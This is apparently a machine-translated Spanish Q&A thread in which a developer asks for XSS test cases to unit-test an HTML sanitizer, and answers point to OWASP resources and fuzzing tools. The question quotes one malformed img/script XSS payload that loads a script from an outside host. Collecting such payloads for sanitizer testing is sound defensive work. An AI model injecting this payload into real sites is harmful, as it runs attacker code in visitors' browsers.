XSS Torture Test - ¿existe?

Question

Estoy buscando escribir un higienizador html, y obviamente para probar/probar que funciona correctamente, necesito un conjunto de ejemplos XSS para lanzar contra él y ver cómo funciona. He aquí una nice example from Coding Horror

<img src=""http://www.a.com/a.jpg<script type=text/javascript 
src="http://1.2.3.4:81/xss.js">" /><<img 
src=""http://www.a.com/a.jpg</script>" 

Sé que hay un Mime Torture Test que se compone de varios mensajes de correo electrónico con archivos adjuntos anidados que se usan para probar los decodificadores Mime (si pueden decodificar correctamente, a continuación, que han sido probados para trabajar). Básicamente estoy buscando un equivalente para XSS, es decir, una lista de ejemplos de hodml dudoso que puedo lanzar a mi desinfectante solo para asegurarme de que funciona bien.

Si alguien tiene también buenos recursos sobre cómo escribir el desinfectante (es decir, qué exploits comunes intentan usar las personas, etc.), también serían recibidos con gratitud.

Gracias de antemano :-)

Edit: Lo siento si esto no estaba claro antes, pero fue después de una serie de pruebas de tortura para que pueda escribir pruebas unitarias para el desinfectante, no probarlo en el navegador , etc. Los datos fuente en teoría pueden haber venido de cualquier parte, no solo de un navegador.

Answer 1

Tome un vistazo a esta lista de trucos XSS: https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

Answer 2

XSS Me es un gran plugin de Firefox que puede ejecutar en contra de su desinfectante.

Answer 3

Echa un vistazo OWASP. Tienen una buena guía sobre cómo funciona XSS, qué buscar, e incluso el proyecto WebGoat, donde puede probar su mano en un sitio vulnerable.

Answer 4

Puede probar el jsfunfuzz de Jesse Ruderman (http://www.squarefree.com/2007/08/02/introducing-jsfunfuzz/) que arroja datos aleatorios en su Javascript tratando de romperlo. Parece que el equipo de Firefox lo ha usado con gran éxito.